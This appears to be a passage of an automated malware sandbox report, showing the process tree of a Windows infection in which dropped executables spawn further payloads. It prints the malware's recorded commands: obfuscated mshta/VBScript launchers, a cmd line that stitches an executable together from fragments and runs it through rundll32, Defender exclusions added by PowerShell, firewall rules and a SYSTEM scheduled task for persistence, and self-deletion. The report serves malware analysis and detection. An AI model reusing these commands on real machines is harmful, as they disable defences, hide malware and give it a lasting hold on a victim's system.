                                                                                            PID:3308
                                                                                          • C:\Users\Admin\Pictures\Adobe Films\8hgvCOGorxoDrU9x69zrw7Pq.exe
                                                                                            "C:\Users\Admin\Pictures\Adobe Films\8hgvCOGorxoDrU9x69zrw7Pq.exe"
                                                                                            2⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:876
                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 896
                                                                                              3⤵
                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                              • Program crash
                                                                                              PID:600
                                                                                          • C:\Users\Admin\Pictures\Adobe Films\dwCMfGEo1hnajMsfWB1A08nw.exe
                                                                                            "C:\Users\Admin\Pictures\Adobe Films\dwCMfGEo1hnajMsfWB1A08nw.exe"
                                                                                            2⤵
                                                                                            • Executes dropped EXE
                                                                                            • Checks BIOS information in registry
                                                                                            • Checks whether UAC is enabled
                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                            PID:660
                                                                                          • C:\Users\Admin\Pictures\Adobe Films\pMExZ8gMqDkb5PHE0aly4ST8.exe
                                                                                            "C:\Users\Admin\Pictures\Adobe Films\pMExZ8gMqDkb5PHE0aly4ST8.exe"
                                                                                            2⤵
                                                                                            • Executes dropped EXE
                                                                                            • Suspicious use of SetThreadContext
                                                                                            PID:668
                                                                                            • C:\Users\Admin\Pictures\Adobe Films\pMExZ8gMqDkb5PHE0aly4ST8.exe
                                                                                              "C:\Users\Admin\Pictures\Adobe Films\pMExZ8gMqDkb5PHE0aly4ST8.exe"
                                                                                              3⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:2140
                                                                                          • C:\Users\Admin\Pictures\Adobe Films\8Amfj2WNKnPqz94ynFCQJZcE.exe
                                                                                            "C:\Users\Admin\Pictures\Adobe Films\8Amfj2WNKnPqz94ynFCQJZcE.exe"
                                                                                            2⤵
                                                                                            • Executes dropped EXE
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:592
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              cmd.exe /c taskkill /f /im chrome.exe
                                                                                              3⤵
                                                                                                PID:6516
                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                  taskkill /f /im chrome.exe
                                                                                                  4⤵
                                                                                                  • Kills process with taskkill
                                                                                                  PID:1984
                                                                                            • C:\Users\Admin\Pictures\Adobe Films\kTHltE_Rv0cH3eu2OI1IkX9v.exe
                                                                                              "C:\Users\Admin\Pictures\Adobe Films\kTHltE_Rv0cH3eu2OI1IkX9v.exe"
                                                                                              2⤵
                                                                                              • Executes dropped EXE
                                                                                              • Checks whether UAC is enabled
                                                                                              PID:1488
                                                                                            • C:\Users\Admin\Pictures\Adobe Films\p0bzK61gNo9ZHP8VhUMpaiap.exe
                                                                                              "C:\Users\Admin\Pictures\Adobe Films\p0bzK61gNo9ZHP8VhUMpaiap.exe"
                                                                                              2⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:1348
                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                "C:\Windows\System32\mshta.exe" VBsCRIPt:cLose ( creAteObjecT ("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\p0bzK61gNo9ZHP8VhUMpaiap.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\p0bzK61gNo9ZHP8VhUMpaiap.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )
                                                                                                3⤵
                                                                                                  PID:2920
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    "C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\p0bzK61gNo9ZHP8VhUMpaiap.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\p0bzK61gNo9ZHP8VhUMpaiap.exe" ) do taskkill -im "%~NxK" -F
                                                                                                    4⤵
                                                                                                      PID:4104
                                                                                                • C:\Users\Admin\Pictures\Adobe Films\GouRyMwa0QnLDOugqtkz6E1a.exe
                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\GouRyMwa0QnLDOugqtkz6E1a.exe"
                                                                                                  2⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:1876
                                                                                                  • C:\Program Files (x86)\Company\NewProduct\cutm3.exe
                                                                                                    "C:\Program Files (x86)\Company\NewProduct\cutm3.exe"
                                                                                                    3⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:3316
                                                                                                • C:\Users\Admin\Pictures\Adobe Films\k6gqoa3o8siGW6G_qXIuUk6T.exe
                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\k6gqoa3o8siGW6G_qXIuUk6T.exe"
                                                                                                  2⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:4324
                                                                                                  • C:\Users\Admin\AppData\Roaming\7099126.exe
                                                                                                    "C:\Users\Admin\AppData\Roaming\7099126.exe"
                                                                                                    3⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:4832
                                                                                                  • C:\Users\Admin\AppData\Roaming\1589567.exe
                                                                                                    "C:\Users\Admin\AppData\Roaming\1589567.exe"
                                                                                                    3⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Adds Run key to start application
                                                                                                    PID:3248
                                                                                                    • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                                                      "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                                                      4⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:5356
                                                                                                  • C:\Users\Admin\AppData\Roaming\246716.exe
                                                                                                    "C:\Users\Admin\AppData\Roaming\246716.exe"
                                                                                                    3⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Checks BIOS information in registry
                                                                                                    • Checks whether UAC is enabled
                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                    PID:4520
                                                                                                  • C:\Users\Admin\AppData\Roaming\4197682.exe
                                                                                                    "C:\Users\Admin\AppData\Roaming\4197682.exe"
                                                                                                    3⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Checks BIOS information in registry
                                                                                                    • Checks whether UAC is enabled
                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                    PID:2812
                                                                                                  • C:\Users\Admin\AppData\Roaming\3981940.exe
                                                                                                    "C:\Users\Admin\AppData\Roaming\3981940.exe"
                                                                                                    3⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Checks BIOS information in registry
                                                                                                    • Checks whether UAC is enabled
                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                    PID:5216
                                                                                                  • C:\Users\Admin\AppData\Roaming\1570646.exe
                                                                                                    "C:\Users\Admin\AppData\Roaming\1570646.exe"
                                                                                                    3⤵
                                                                                                      PID:5280
                                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                                        "C:\Windows\System32\mshta.exe" VbscRIpT: cLosE ( cREaTeOBjeCT ( "wsCriPT.sHELl" ). rUN ( "Cmd.exe /q /c Type ""C:\Users\Admin\AppData\Roaming\1570646.exe"" > kSTw_GRvR1eDFi.EXE && StARt kStW_grVR1EDFi.exE /P6l3hjJm2mK1sJpxUmLJ & If """"== """" for %k In ( ""C:\Users\Admin\AppData\Roaming\1570646.exe"" ) do taskkill /F /Im ""%~Nxk"" " , 0 , trUE) )
                                                                                                        4⤵
                                                                                                          PID:5832
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            "C:\Windows\System32\cmd.exe" /q /c Type "C:\Users\Admin\AppData\Roaming\1570646.exe"> kSTw_GRvR1eDFi.EXE && StARt kStW_grVR1EDFi.exE /P6l3hjJm2mK1sJpxUmLJ& If ""== "" for %k In ( "C:\Users\Admin\AppData\Roaming\1570646.exe" ) do taskkill /F /Im "%~Nxk"
                                                                                                            5⤵
                                                                                                              PID:5328
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\kSTw_GRvR1eDFi.EXE
                                                                                                                kStW_grVR1EDFi.exE /P6l3hjJm2mK1sJpxUmLJ
                                                                                                                6⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:5820
                                                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                                                  "C:\Windows\System32\mshta.exe" VbscRIpT: cLosE ( cREaTeOBjeCT ( "wsCriPT.sHELl" ). rUN ( "Cmd.exe /q /c Type ""C:\Users\Admin\AppData\Local\Temp\kSTw_GRvR1eDFi.EXE"" > kSTw_GRvR1eDFi.EXE && StARt kStW_grVR1EDFi.exE /P6l3hjJm2mK1sJpxUmLJ & If ""/P6l3hjJm2mK1sJpxUmLJ""== """" for %k In ( ""C:\Users\Admin\AppData\Local\Temp\kSTw_GRvR1eDFi.EXE"" ) do taskkill /F /Im ""%~Nxk"" " , 0 , trUE) )
                                                                                                                  7⤵
                                                                                                                    PID:4548
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      "C:\Windows\System32\cmd.exe" /q /c Type "C:\Users\Admin\AppData\Local\Temp\kSTw_GRvR1eDFi.EXE"> kSTw_GRvR1eDFi.EXE && StARt kStW_grVR1EDFi.exE /P6l3hjJm2mK1sJpxUmLJ& If "/P6l3hjJm2mK1sJpxUmLJ"== "" for %k In ( "C:\Users\Admin\AppData\Local\Temp\kSTw_GRvR1eDFi.EXE" ) do taskkill /F /Im "%~Nxk"
                                                                                                                      8⤵
                                                                                                                        PID:3064
                                                                                                                    • C:\Windows\SysWOW64\mshta.exe
                                                                                                                      "C:\Windows\System32\mshta.exe" VBscrIPT: cLOSE ( cREATEobjeCt ( "WSCRIPt.SheLL" ). ruN ( "C:\Windows\system32\cmd.exe /q /C echo %DatE%cl1V> 8KyK.ZNp & Echo | sET /P = ""MZ"" > hXUPL.XH & CoPY /b /Y HXUPL.XH + QR7i5Ur.BRU + wZfTO2F9.TkR + 3W6U.X2 + 8Kyk.ZNp GkQ1GTV.ZNM & StArT control .\GKq1GTV.ZnM " , 0 , TrUe ) )
                                                                                                                      7⤵
                                                                                                                        PID:5800
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          "C:\Windows\system32\cmd.exe" /q /C echo ÚtE%cl1V> 8KyK.ZNp & Echo | sET /P = "MZ" >hXUPL.XH & CoPY /b /Y HXUPL.XH +QR7i5Ur.BRU + wZfTO2F9.TkR + 3W6U.X2 + 8Kyk.ZNp GkQ1GTV.ZNM& StArT control .\GKq1GTV.ZnM
                                                                                                                          8⤵
                                                                                                                            PID:5272
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" Echo "
                                                                                                                              9⤵
                                                                                                                                PID:5672
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /S /D /c" sET /P = "MZ" 1>hXUPL.XH"
                                                                                                                                9⤵
                                                                                                                                  PID:5228
                                                                                                                                • C:\Windows\SysWOW64\control.exe
                                                                                                                                  control .\GKq1GTV.ZnM
                                                                                                                                  9⤵
                                                                                                                                    PID:5700
                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                      "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\GKq1GTV.ZnM
                                                                                                                                      10⤵
                                                                                                                                      • Loads dropped DLL
                                                                                                                                      PID:6548
                                                                                                                                      • C:\Windows\system32\RunDll32.exe
                                                                                                                                        C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\GKq1GTV.ZnM
                                                                                                                                        11⤵
                                                                                                                                          PID:4276
                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                            "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\GKq1GTV.ZnM
                                                                                                                                            12⤵
                                                                                                                                            • Loads dropped DLL
                                                                                                                                            PID:2192
                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                taskkill /F /Im "1570646.exe"
                                                                                                                                6⤵
                                                                                                                                • Kills process with taskkill
                                                                                                                                PID:3912
                                                                                                                        • C:\Users\Admin\AppData\Roaming\3952959.exe
                                                                                                                          "C:\Users\Admin\AppData\Roaming\3952959.exe"
                                                                                                                          3⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          PID:5336
                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\VpZqxa5q8PYXpq7wrf2_UXW6.exe
                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\VpZqxa5q8PYXpq7wrf2_UXW6.exe"
                                                                                                                        2⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Checks BIOS information in registry
                                                                                                                        • Checks whether UAC is enabled
                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                        PID:3712
                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\o2NWB1S3sRjsrjZZho3rS3Yx.exe
                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\o2NWB1S3sRjsrjZZho3rS3Yx.exe"
                                                                                                                        2⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Drops file in Windows directory
                                                                                                                        PID:3844
                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
                                                                                                                          3⤵
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:3480
                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \
                                                                                                                          3⤵
                                                                                                                            PID:4680
                                                                                                                          • C:\Windows\System32\netsh.exe
                                                                                                                            "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                                                            3⤵
                                                                                                                              PID:1388
                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                4⤵
                                                                                                                                  PID:5076
                                                                                                                              • C:\Windows\System32\netsh.exe
                                                                                                                                "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                                                                3⤵
                                                                                                                                  PID:4372
                                                                                                                                • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                                  schtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM
                                                                                                                                  3⤵
                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                  PID:4464
                                                                                                                                • C:\Windows\System\svchost.exe
                                                                                                                                  "C:\Windows\System\svchost.exe" formal
                                                                                                                                  3⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Drops file in Windows directory
                                                                                                                                  PID:2240
                                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\ffkby0AEQGBlgXaObhgpT4gK.exe
                                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\ffkby0AEQGBlgXaObhgpT4gK.exe"
                                                                                                                                2⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                • Checks BIOS information in registry
                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                PID:3032
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Refutatory.exe
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\Refutatory.exe"
                                                                                                                                  3⤵
                                                                                                                                    PID:12564
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\tory.exe
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\tory.exe"
                                                                                                                                    3⤵
                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                    PID:12776
                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\VXqO0Pdt6YuIxfT5Yn92TZNW.exe
                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\VXqO0Pdt6YuIxfT5Yn92TZNW.exe"
                                                                                                                                  2⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  PID:2612
                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\VXqO0Pdt6YuIxfT5Yn92TZNW.exe
                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\VXqO0Pdt6YuIxfT5Yn92TZNW.exe"
                                                                                                                                    3⤵
                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                    PID:13744
                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\dMvQJ8Y0jxjfWfPIt7cSEQU3.exe
                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\dMvQJ8Y0jxjfWfPIt7cSEQU3.exe"
                                                                                                                                  2⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Loads dropped DLL
                                                                                                                                  • Checks processor information in registry
                                                                                                                                  PID:2440
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\dMvQJ8Y0jxjfWfPIt7cSEQU3.exe" & exit
                                                                                                                                    3⤵
                                                                                                                                      PID:5532
                                                                                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                        timeout /t 5
                                                                                                                                        4⤵
                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                        PID:3144
                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\FxKCzkEdadUnXIr4aeYqrHzO.exe
                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\FxKCzkEdadUnXIr4aeYqrHzO.exe"
                                                                                                                                    2⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                    PID:2400
                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\FxKCzkEdadUnXIr4aeYqrHzO.exe
                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\FxKCzkEdadUnXIr4aeYqrHzO.exe"
                                                                                                                                      3⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      PID:5496
                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\Jab6IQUfUei0hdSDxQhDqCdK.exe
                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\Jab6IQUfUei0hdSDxQhDqCdK.exe"
                                                                                                                                    2⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                    PID:2388
                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 556
                                                                                                                                      3⤵
                                                                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                      • Program crash
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:3824
                                                                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                                                                                                      3⤵
                                                                                                                                        PID:3408
                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\oYN1KDjaaZEQCjCCghaL0JjV.exe
                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\oYN1KDjaaZEQCjCCghaL0JjV.exe"
                                                                                                                                      2⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                      PID:2256
                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\iY2757FpOsyIgCPWK2ZZkR1m.exe
                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\iY2757FpOsyIgCPWK2ZZkR1m.exe"
                                                                                                                                      2⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      PID:1652
                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 1652 -s 664
                                                                                                                                        3⤵
                                                                                                                                        • Program crash
                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                        PID:3688
                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 1652 -s 688
                                                                                                                                        3⤵
                                                                                                                                        • Program crash
                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                        PID:3176
                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 1652 -s 664
                                                                                                                                        3⤵
                                                                                                                                        • Program crash
                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                        PID:4436
                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 1652 -s 680
                                                                                                                                        3⤵
                                                                                                                                        • Program crash
                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                        PID:2708
                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 1652 -s 1128
                                                                                                                                        3⤵
                                                                                                                                        • Program crash
                                                                                                                                        PID:2416
                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 1652 -s 1080
                                                                                                                                        3⤵
                                                                                                                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                        • Program crash
                                                                                                                                        PID:5536
                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\ys_N8RpJSKwHvORweMAL6p9C.exe
                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\ys_N8RpJSKwHvORweMAL6p9C.exe"
                                                                                                                                      2⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Loads dropped DLL
                                                                                                                                      PID:3820
                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
                                                                                                                                        C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
                                                                                                                                        3⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Loads dropped DLL
                                                                                                                                        • Adds Run key to start application
                                                                                                                                        PID:5584
                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--cSExK3QD"
                                                                                                                                          4⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • Checks computer location settings
                                                                                                                                          • Loads dropped DLL
                                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                                                          PID:5484
                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                            C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1e0,0x1e4,0x1e8,0x1bc,0x1ec,0x7ffd3599dec0,0x7ffd3599ded0,0x7ffd3599dee0
                                                                                                                                            5⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            • Loads dropped DLL
                                                                                                                                            PID:1520
                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                              C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff6a49f9e70,0x7ff6a49f9e80,0x7ff6a49f9e90
                                                                                                                                              6⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Loads dropped DLL
                                                                                                                                              PID:5128
                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1628,2870539763487307749,2634120370468598849,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5484_1150154333" --mojo-platform-channel-handle=1720 /prefetch:8
                                                                                                                                            5⤵
                                                                                                                                            • Loads dropped DLL
                                                                                                                                            PID:5104
                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1628,2870539763487307749,2634120370468598849,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5484_1150154333" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1676 /prefetch:2
                                                                                                                                            5⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            • Loads dropped DLL
                                                                                                                                            PID:4632
                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1628,2870539763487307749,2634120370468598849,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5484_1150154333" --mojo-platform-channel-handle=2036 /prefetch:8
                                                                                                                                            5⤵
                                                                                                                                            • Loads dropped DLL
                                                                                                                                            PID:4276
                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1628,2870539763487307749,2634120370468598849,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5484_1150154333" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=1020 /prefetch:1
                                                                                                                                            5⤵
                                                                                                                                            • Checks computer location settings
                                                                                                                                            • Loads dropped DLL
                                                                                                                                            PID:12856
                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1628,2870539763487307749,2634120370468598849,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5484_1150154333" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2492 /prefetch:2
                                                                                                                                            5⤵
                                                                                                                                            • Loads dropped DLL
                                                                                                                                            PID:12904
                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
